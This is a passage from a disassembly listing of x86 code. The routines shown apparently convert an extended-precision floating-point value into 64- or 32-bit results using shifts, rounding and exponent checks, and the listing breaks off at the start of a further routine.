; ---------------------------------------------------------------------------
loc_411A34: ; CODE XREF: sub_411969+D6�j
cmp [ebp+eax*4+var_20], 0
loc_411A39: ; CODE XREF: sub_411969+C9�j
jnz short loc_411A43
inc eax
cmp eax, 3
jl short loc_411A34
jmp short loc_411AB1
; ---------------------------------------------------------------------------
loc_411A43: ; CODE XREF: sub_411969:loc_411A39�j
mov eax, esi
cdq
push 1Fh
pop ecx
and edx, ecx
add eax, edx
sar eax, 5
and esi, 8000001Fh
jns short loc_411A5D
dec esi
or esi, 0FFFFFFE0h
inc esi
loc_411A5D: ; CODE XREF: sub_411969+ED�j
and [ebp+var_4], 0
sub ecx, esi
xor edx, edx
inc edx
shl edx, cl
lea ecx, [ebp+eax*4+var_20]
mov esi, [ecx]
add esi, edx
mov [ebp+arg_0], esi
mov esi, [ecx]
cmp [ebp+arg_0], esi
jb short loc_411A9C
cmp [ebp+arg_0], edx
jmp short loc_411A9A
; ---------------------------------------------------------------------------
loc_411A7F: ; CODE XREF: sub_411969+143�j
test ecx, ecx
jz short loc_411AAE
and [ebp+var_4], 0
lea ecx, [ebp+eax*4+var_20]
mov edx, [ecx]
lea esi, [edx+1]
cmp esi, edx
mov [ebp+arg_0], esi
jb short loc_411A9C
cmp esi, 1
loc_411A9A: ; CODE XREF: sub_411969+114�j
jnb short loc_411AA3
loc_411A9C: ; CODE XREF: sub_411969+10F�j
; sub_411969+12C�j
mov [ebp+var_4], 1
loc_411AA3: ; CODE XREF: sub_411969:loc_411A9A�j
dec eax
mov edx, [ebp+arg_0]
mov [ecx], edx
mov ecx, [ebp+var_4]
jns short loc_411A7F
loc_411AAE: ; CODE XREF: sub_411969+118�j
mov [ebp+arg_0], ecx
loc_411AB1: ; CODE XREF: sub_411969+B5�j
; sub_411969+D8�j
mov ecx, [ebp+var_8]
or eax, 0FFFFFFFFh
shl eax, cl
and [edi], eax
mov eax, [ebp+var_C]
inc eax
cmp eax, 3
jge short loc_411AD1
push 3
pop ecx
lea edi, [ebp+eax*4+var_20]
sub ecx, eax
xor eax, eax
rep stosd
loc_411AD1: ; CODE XREF: sub_411969+159�j
cmp [ebp+arg_0], 0
jz short loc_411AD8
inc ebx
loc_411AD8: ; CODE XREF: sub_411969+16C�j
mov eax, ds:dword_424234
mov ecx, eax
sub ecx, ds:dword_424238
cmp ebx, ecx
jge short loc_411AF6
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosd
jmp loc_411D03
; ---------------------------------------------------------------------------
loc_411AF6: ; CODE XREF: sub_411969+17E�j
cmp ebx, eax
jg loc_411D0D
sub eax, [ebp+var_10]
lea esi, [ebp+var_2C]
mov ecx, eax
lea edi, [ebp+var_20]
movsd
cdq
and edx, 1Fh
add eax, edx
movsd
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
movsd
jns short loc_411B24
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411B24: ; CODE XREF: sub_411969+1B4�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_411B3F: ; CODE XREF: sub_411969+201�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_411B3F
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_411B79: ; CODE XREF: sub_411969+227�j
cmp edx, eax
jl short loc_411B85
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_411B8A
; ---------------------------------------------------------------------------
loc_411B85: ; CODE XREF: sub_411969+212�j
and [ebp+edx*4+var_20], 0
loc_411B8A: ; CODE XREF: sub_411969+21A�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_411B79
mov esi, ds:dword_424238
dec esi
lea ecx, [esi+1]
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov edx, ecx
and edx, 8000001Fh
mov [ebp+var_C], eax
jns short loc_411BB9
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411BB9: ; CODE XREF: sub_411969+249�j
push 1Fh
pop ecx
sub ecx, edx
xor edx, edx
inc edx
shl edx, cl
lea ebx, [ebp+eax*4+var_20]
mov [ebp+var_10], ecx
test [ebx], edx
jz loc_411C54
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [ebp+eax*4+var_20], edx
jmp short loc_411BE4
; ---------------------------------------------------------------------------
loc_411BDF: ; CODE XREF: sub_411969+281�j
cmp [ebp+eax*4+var_20], 0
loc_411BE4: ; CODE XREF: sub_411969+274�j
jnz short loc_411BEE
inc eax
cmp eax, 3
jl short loc_411BDF
jmp short loc_411C54
; ---------------------------------------------------------------------------
loc_411BEE: ; CODE XREF: sub_411969:loc_411BE4�j
mov eax, esi
cdq
push 1Fh
pop ecx
and edx, ecx
add eax, edx
sar eax, 5
and esi, 8000001Fh
jns short loc_411C08
dec esi
or esi, 0FFFFFFE0h
inc esi
loc_411C08: ; CODE XREF: sub_411969+298�j
and [ebp+arg_0], 0
xor edx, edx
sub ecx, esi
inc edx
shl edx, cl
lea ecx, [ebp+eax*4+var_20]
mov esi, [ecx]
lea edi, [esi+edx]
cmp edi, esi
jb short loc_411C24
cmp edi, edx
jnb short loc_411C2B
loc_411C24: ; CODE XREF: sub_411969+2B5�j
mov [ebp+arg_0], 1
loc_411C2B: ; CODE XREF: sub_411969+2B9�j
mov [ecx], edi
mov ecx, [ebp+arg_0]
jmp short loc_411C51
; ---------------------------------------------------------------------------
loc_411C32: ; CODE XREF: sub_411969+2E9�j
test ecx, ecx
jz short loc_411C54
lea ecx, [ebp+eax*4+var_20]
mov edx, [ecx]
lea esi, [edx+1]
xor edi, edi
cmp esi, edx
jb short loc_411C4A
cmp esi, 1
jnb short loc_411C4D
loc_411C4A: ; CODE XREF: sub_411969+2DA�j
xor edi, edi
inc edi
loc_411C4D: ; CODE XREF: sub_411969+2DF�j
mov [ecx], esi
mov ecx, edi
loc_411C51: ; CODE XREF: sub_411969+2C7�j
dec eax
jns short loc_411C32
loc_411C54: ; CODE XREF: sub_411969+263�j
; sub_411969+283�j ...
mov ecx, [ebp+var_10]
or eax, 0FFFFFFFFh
shl eax, cl
and [ebx], eax
mov eax, [ebp+var_C]
inc eax
cmp eax, 3
jge short loc_411C74
push 3
pop ecx
lea edi, [ebp+eax*4+var_20]
sub ecx, eax
xor eax, eax
rep stosd
loc_411C74: ; CODE XREF: sub_411969+2FC�j
mov ecx, ds:dword_42423C
inc ecx
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_411C95
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411C95: ; CODE XREF: sub_411969+325�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_411CB0: ; CODE XREF: sub_411969+372�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_411CB0
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_411CEA: ; CODE XREF: sub_411969+398�j
cmp edx, eax
jl short loc_411CF6
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_411CFB
; ---------------------------------------------------------------------------
loc_411CF6: ; CODE XREF: sub_411969+383�j
and [ebp+edx*4+var_20], 0
loc_411CFB: ; CODE XREF: sub_411969+38B�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_411CEA
loc_411D03: ; CODE XREF: sub_411969+188�j
push 2
xor ebx, ebx
pop eax
jmp loc_411E67
; ---------------------------------------------------------------------------
loc_411D0D: ; CODE XREF: sub_411969+18F�j
cmp ebx, ds:dword_424230
mov ecx, ds:dword_42423C
jl loc_411DCC
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosd
or [ebp+var_20], 80000000h
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_411D48
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411D48: ; CODE XREF: sub_411969+3D8�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_411D63: ; CODE XREF: sub_411969+425�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_411D63
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_411D9D: ; CODE XREF: sub_411969+44B�j
cmp edx, eax
jl short loc_411DA9
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_411DAE
; ---------------------------------------------------------------------------
loc_411DA9: ; CODE XREF: sub_411969+436�j
and [ebp+edx*4+var_20], 0
loc_411DAE: ; CODE XREF: sub_411969+43E�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_411D9D
mov eax, ds:dword_424230
mov ecx, ds:dword_424244
lea ebx, [ecx+eax]
xor eax, eax
inc eax
jmp loc_411E67
; ---------------------------------------------------------------------------
loc_411DCC: ; CODE XREF: sub_411969+3B0�j
mov eax, ds:dword_424244
and [ebp+var_20], 7FFFFFFFh
add ebx, eax
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_411DF4
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411DF4: ; CODE XREF: sub_411969+484�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or esi, 0FFFFFFFFh
mov ecx, edx
shl esi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not esi
loc_411E0F: ; CODE XREF: sub_411969+4D4�j
mov ecx, [ebp+arg_0]
mov edi, [ebp+ecx*4+var_20]
mov ecx, edi
and ecx, esi
mov [ebp+var_10], ecx
mov ecx, edx
shr edi, cl
mov ecx, [ebp+arg_0]
or edi, [ebp+var_C]
mov [ebp+ecx*4+var_20], edi
mov edi, [ebp+var_10]
mov ecx, [ebp+var_4]
shl edi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], edi
jl short loc_411E0F
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_411E4C: ; CODE XREF: sub_411969+4FA�j
cmp edx, eax
jl short loc_411E58
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_411E5D
; ---------------------------------------------------------------------------
loc_411E58: ; CODE XREF: sub_411969+4E5�j
and [ebp+edx*4+var_20], 0
loc_411E5D: ; CODE XREF: sub_411969+4ED�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_411E4C
xor eax, eax
loc_411E67: ; CODE XREF: sub_411969+39F�j
; sub_411969+45E�j
pop esi
loc_411E68: ; CODE XREF: sub_411969+55�j
; sub_411969+65�j
push 1Fh
pop ecx
sub ecx, ds:dword_42423C
shl ebx, cl
mov ecx, [ebp+var_14]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or ebx, ecx
mov ecx, ds:dword_424240
or ebx, [ebp+var_20]
cmp ecx, 40h
jnz short loc_411E9D
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_1C]
mov [ecx+4], ebx
mov [ecx], edx
jmp short loc_411EA7
; ---------------------------------------------------------------------------
loc_411E9D: ; CODE XREF: sub_411969+525�j
cmp ecx, 20h
jnz short loc_411EA7
mov ecx, [ebp+arg_4]
mov [ecx], ebx
loc_411EA7: ; CODE XREF: sub_411969+532�j
; sub_411969+537�j
pop edi
pop ebx
leave
retn
sub_411969 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411EAB proc near ; CODE XREF: sub_411553+44�p
var_2C = byte ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, [ebp+arg_0]
movzx ecx, word ptr [eax+0Ah]
push ebx
mov ebx, ecx
and ecx, 8000h
mov [ebp+var_14], ecx
mov ecx, [eax+6]
mov [ebp+var_20], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
and ebx, 7FFFh
sub ebx, 3FFFh
shl eax, 10h
cmp ebx, 0FFFFC001h
push edi
mov [ebp+var_1C], ecx
mov [ebp+var_18], eax
jnz short loc_411F15
xor ebx, ebx
xor eax, eax
loc_411EF2: ; CODE XREF: sub_411EAB+51�j
cmp [ebp+eax*4+var_20], ebx
jnz short loc_411F05
inc eax
cmp eax, 3
jl short loc_411EF2
xor eax, eax
jmp loc_4123AA
; ---------------------------------------------------------------------------
loc_411F05: ; CODE XREF: sub_411EAB+4B�j
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
push 2
stosd
pop eax
jmp loc_4123AA
; ---------------------------------------------------------------------------
loc_411F15: ; CODE XREF: sub_411EAB+41�j
and [ebp+arg_0], 0
push esi
lea esi, [ebp+var_20]
lea edi, [ebp+var_2C]
movsd
movsd
movsd
mov esi, ds:dword_424250
dec esi
lea ecx, [esi+1]
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov edx, ecx
and edx, 8000001Fh
mov [ebp+var_10], ebx
mov [ebp+var_C], eax
jns short loc_411F4D
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411F4D: ; CODE XREF: sub_411EAB+9B�j
lea edi, [ebp+eax*4+var_20]
push 1Fh
xor eax, eax
pop ecx
sub ecx, edx
inc eax
shl eax, cl
mov [ebp+var_8], ecx
test [edi], eax
jz loc_411FF3
mov eax, [ebp+var_C]
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [ebp+eax*4+var_20], edx
jmp short loc_411F7B
; ---------------------------------------------------------------------------
loc_411F76: ; CODE XREF: sub_411EAB+D6�j
cmp [ebp+eax*4+var_20], 0
loc_411F7B: ; CODE XREF: sub_411EAB+C9�j
jnz short loc_411F85
inc eax
cmp eax, 3
jl short loc_411F76
jmp short loc_411FF3
; ---------------------------------------------------------------------------
loc_411F85: ; CODE XREF: sub_411EAB:loc_411F7B�j
mov eax, esi
cdq
push 1Fh
pop ecx
and edx, ecx
add eax, edx
sar eax, 5
and esi, 8000001Fh
jns short loc_411F9F
dec esi
or esi, 0FFFFFFE0h
inc esi
loc_411F9F: ; CODE XREF: sub_411EAB+ED�j
and [ebp+var_4], 0
sub ecx, esi
xor edx, edx
inc edx
shl edx, cl
lea ecx, [ebp+eax*4+var_20]
mov esi, [ecx]
add esi, edx
mov [ebp+arg_0], esi
mov esi, [ecx]
cmp [ebp+arg_0], esi
jb short loc_411FDE
cmp [ebp+arg_0], edx
jmp short loc_411FDC
; ---------------------------------------------------------------------------
loc_411FC1: ; CODE XREF: sub_411EAB+143�j
test ecx, ecx
jz short loc_411FF0
and [ebp+var_4], 0
lea ecx, [ebp+eax*4+var_20]
mov edx, [ecx]
lea esi, [edx+1]
cmp esi, edx
mov [ebp+arg_0], esi
jb short loc_411FDE
cmp esi, 1
loc_411FDC: ; CODE XREF: sub_411EAB+114�j
jnb short loc_411FE5
loc_411FDE: ; CODE XREF: sub_411EAB+10F�j
; sub_411EAB+12C�j
mov [ebp+var_4], 1
loc_411FE5: ; CODE XREF: sub_411EAB:loc_411FDC�j
dec eax
mov edx, [ebp+arg_0]
mov [ecx], edx
mov ecx, [ebp+var_4]
jns short loc_411FC1
loc_411FF0: ; CODE XREF: sub_411EAB+118�j
mov [ebp+arg_0], ecx
loc_411FF3: ; CODE XREF: sub_411EAB+B5�j
; sub_411EAB+D8�j
mov ecx, [ebp+var_8]
or eax, 0FFFFFFFFh
shl eax, cl
and [edi], eax
mov eax, [ebp+var_C]
inc eax
cmp eax, 3
jge short loc_412013
push 3
pop ecx
lea edi, [ebp+eax*4+var_20]
sub ecx, eax
xor eax, eax
rep stosd
loc_412013: ; CODE XREF: sub_411EAB+159�j
cmp [ebp+arg_0], 0
jz short loc_41201A
inc ebx
loc_41201A: ; CODE XREF: sub_411EAB+16C�j
mov eax, ds:dword_42424C
mov ecx, eax
sub ecx, ds:dword_424250
cmp ebx, ecx
jge short loc_412038
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosd
jmp loc_412245
; ---------------------------------------------------------------------------
loc_412038: ; CODE XREF: sub_411EAB+17E�j
cmp ebx, eax
jg loc_41224F
sub eax, [ebp+var_10]
lea esi, [ebp+var_2C]
mov ecx, eax
lea edi, [ebp+var_20]
movsd
cdq
and edx, 1Fh
add eax, edx
movsd
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
movsd
jns short loc_412066
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_412066: ; CODE XREF: sub_411EAB+1B4�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_412081: ; CODE XREF: sub_411EAB+201�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_412081
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_4120BB: ; CODE XREF: sub_411EAB+227�j
cmp edx, eax
jl short loc_4120C7
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_4120CC
; ---------------------------------------------------------------------------
loc_4120C7: ; CODE XREF: sub_411EAB+212�j
and [ebp+edx*4+var_20], 0
loc_4120CC: ; CODE XREF: sub_411EAB+21A�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_4120BB
mov esi, ds:dword_424250
dec esi
lea ecx, [esi+1]
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov edx, ecx
and edx, 8000001Fh
mov [ebp+var_C], eax
jns short loc_4120FB
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_4120FB: ; CODE XREF: sub_411EAB+249�j
push 1Fh
pop ecx
sub ecx, edx
xor edx, edx
inc edx
shl edx, cl
lea ebx, [ebp+eax*4+var_20]
mov [ebp+var_10], ecx
test [ebx], edx
jz loc_412196
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [ebp+eax*4+var_20], edx
jmp short loc_412126
; ---------------------------------------------------------------------------
loc_412121: ; CODE XREF: sub_411EAB+281�j
cmp [ebp+eax*4+var_20], 0
loc_412126: ; CODE XREF: sub_411EAB+274�j
jnz short loc_412130
inc eax
cmp eax, 3
jl short loc_412121
jmp short loc_412196
; ---------------------------------------------------------------------------
loc_412130: ; CODE XREF: sub_411EAB:loc_412126�j
mov eax, esi
cdq
push 1Fh
pop ecx
and edx, ecx
add eax, edx
sar eax, 5
and esi, 8000001Fh
jns short loc_41214A
dec esi
or esi, 0FFFFFFE0h
inc esi
loc_41214A: ; CODE XREF: sub_411EAB+298�j
and [ebp+arg_0], 0
xor edx, edx
sub ecx, esi
inc edx
shl edx, cl
lea ecx, [ebp+eax*4+var_20]
mov esi, [ecx]
lea edi, [esi+edx]
cmp edi, esi
jb short loc_412166
cmp edi, edx
jnb short loc_41216D
loc_412166: ; CODE XREF: sub_411EAB+2B5�j
mov [ebp+arg_0], 1
loc_41216D: ; CODE XREF: sub_411EAB+2B9�j
mov [ecx], edi
mov ecx, [ebp+arg_0]
jmp short loc_412193
; ---------------------------------------------------------------------------
loc_412174: ; CODE XREF: sub_411EAB+2E9�j
test ecx, ecx
jz short loc_412196
lea ecx, [ebp+eax*4+var_20]
mov edx, [ecx]
lea esi, [edx+1]
xor edi, edi
cmp esi, edx
jb short loc_41218C
cmp esi, 1
jnb short loc_41218F
loc_41218C: ; CODE XREF: sub_411EAB+2DA�j
xor edi, edi
inc edi
loc_41218F: ; CODE XREF: sub_411EAB+2DF�j
mov [ecx], esi
mov ecx, edi
loc_412193: ; CODE XREF: sub_411EAB+2C7�j
dec eax
jns short loc_412174
loc_412196: ; CODE XREF: sub_411EAB+263�j
; sub_411EAB+283�j ...
mov ecx, [ebp+var_10]
or eax, 0FFFFFFFFh
shl eax, cl
and [ebx], eax
mov eax, [ebp+var_C]
inc eax
cmp eax, 3
jge short loc_4121B6
push 3
pop ecx
lea edi, [ebp+eax*4+var_20]
sub ecx, eax
xor eax, eax
rep stosd
loc_4121B6: ; CODE XREF: sub_411EAB+2FC�j
mov ecx, ds:dword_424254
inc ecx
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_4121D7
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_4121D7: ; CODE XREF: sub_411EAB+325�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_4121F2: ; CODE XREF: sub_411EAB+372�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_4121F2
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_41222C: ; CODE XREF: sub_411EAB+398�j
cmp edx, eax
jl short loc_412238
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_41223D
; ---------------------------------------------------------------------------
loc_412238: ; CODE XREF: sub_411EAB+383�j
and [ebp+edx*4+var_20], 0
loc_41223D: ; CODE XREF: sub_411EAB+38B�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_41222C
loc_412245: ; CODE XREF: sub_411EAB+188�j
push 2
xor ebx, ebx
pop eax
jmp loc_4123A9
; ---------------------------------------------------------------------------
loc_41224F: ; CODE XREF: sub_411EAB+18F�j
cmp ebx, ds:dword_424248
mov ecx, ds:dword_424254
jl loc_41230E
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosd
or [ebp+var_20], 80000000h
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_41228A
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_41228A: ; CODE XREF: sub_411EAB+3D8�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_4122A5: ; CODE XREF: sub_411EAB+425�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_4122A5
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_4122DF: ; CODE XREF: sub_411EAB+44B�j
cmp edx, eax
jl short loc_4122EB
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_4122F0
; ---------------------------------------------------------------------------
loc_4122EB: ; CODE XREF: sub_411EAB+436�j
and [ebp+edx*4+var_20], 0
loc_4122F0: ; CODE XREF: sub_411EAB+43E�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_4122DF
mov eax, ds:dword_424248
mov ecx, ds:dword_42425C
lea ebx, [ecx+eax]
xor eax, eax
inc eax
jmp loc_4123A9
; ---------------------------------------------------------------------------
loc_41230E: ; CODE XREF: sub_411EAB+3B0�j
mov eax, ds:dword_42425C
and [ebp+var_20], 7FFFFFFFh
add ebx, eax
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_412336
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_412336: ; CODE XREF: sub_411EAB+484�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or esi, 0FFFFFFFFh
mov ecx, edx
shl esi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not esi
loc_412351: ; CODE XREF: sub_411EAB+4D4�j
mov ecx, [ebp+arg_0]
mov edi, [ebp+ecx*4+var_20]
mov ecx, edi
and ecx, esi
mov [ebp+var_10], ecx
mov ecx, edx
shr edi, cl
mov ecx, [ebp+arg_0]
or edi, [ebp+var_C]
mov [ebp+ecx*4+var_20], edi
mov edi, [ebp+var_10]
mov ecx, [ebp+var_4]
shl edi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], edi
jl short loc_412351
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_41238E: ; CODE XREF: sub_411EAB+4FA�j
cmp edx, eax
jl short loc_41239A
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_41239F
; ---------------------------------------------------------------------------
loc_41239A: ; CODE XREF: sub_411EAB+4E5�j
and [ebp+edx*4+var_20], 0
loc_41239F: ; CODE XREF: sub_411EAB+4ED�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_41238E
xor eax, eax
loc_4123A9: ; CODE XREF: sub_411EAB+39F�j
; sub_411EAB+45E�j
pop esi
loc_4123AA: ; CODE XREF: sub_411EAB+55�j
; sub_411EAB+65�j
push 1Fh
pop ecx
sub ecx, ds:dword_424254
shl ebx, cl
mov ecx, [ebp+var_14]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or ebx, ecx
mov ecx, ds:dword_424258
or ebx, [ebp+var_20]
cmp ecx, 40h
jnz short loc_4123DF
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_1C]
mov [ecx+4], ebx
mov [ecx], edx
jmp short loc_4123E9
; ---------------------------------------------------------------------------
loc_4123DF: ; CODE XREF: sub_411EAB+525�j
cmp ecx, 20h
jnz short loc_4123E9
mov ecx, [ebp+arg_4]
mov [ecx], ebx
loc_4123E9: ; CODE XREF: sub_411EAB+532�j
; sub_411EAB+537�j
pop edi
pop ebx
leave
retn
sub_411EAB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4123ED proc near ; CODE XREF: sub_4114AD+37�p
; sub_411553+37�p
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_46 = dword ptr -46h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_32 = dword ptr -32h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_9 = byte ptr -9
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 7Ch
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
xor ebx, ebx
push esi
xor esi, esi
mov [ebp+var_7C], eax
mov eax, [ebp+arg_4]
inc esi
xor ecx, ecx
cmp [ebp+arg_1C], ebx
push edi
mov [ebp+var_70], eax
lea edi, [ebp+var_20]
mov [ebp+var_74], ebx
mov [ebp+var_68], esi
mov [ebp+var_4C], ebx
mov [ebp+var_58], ebx
mov [ebp+var_5C], ebx
mov [ebp+var_60], ebx
mov [ebp+var_64], ebx
mov [ebp+var_50], ebx
mov [ebp+var_6C], ebx
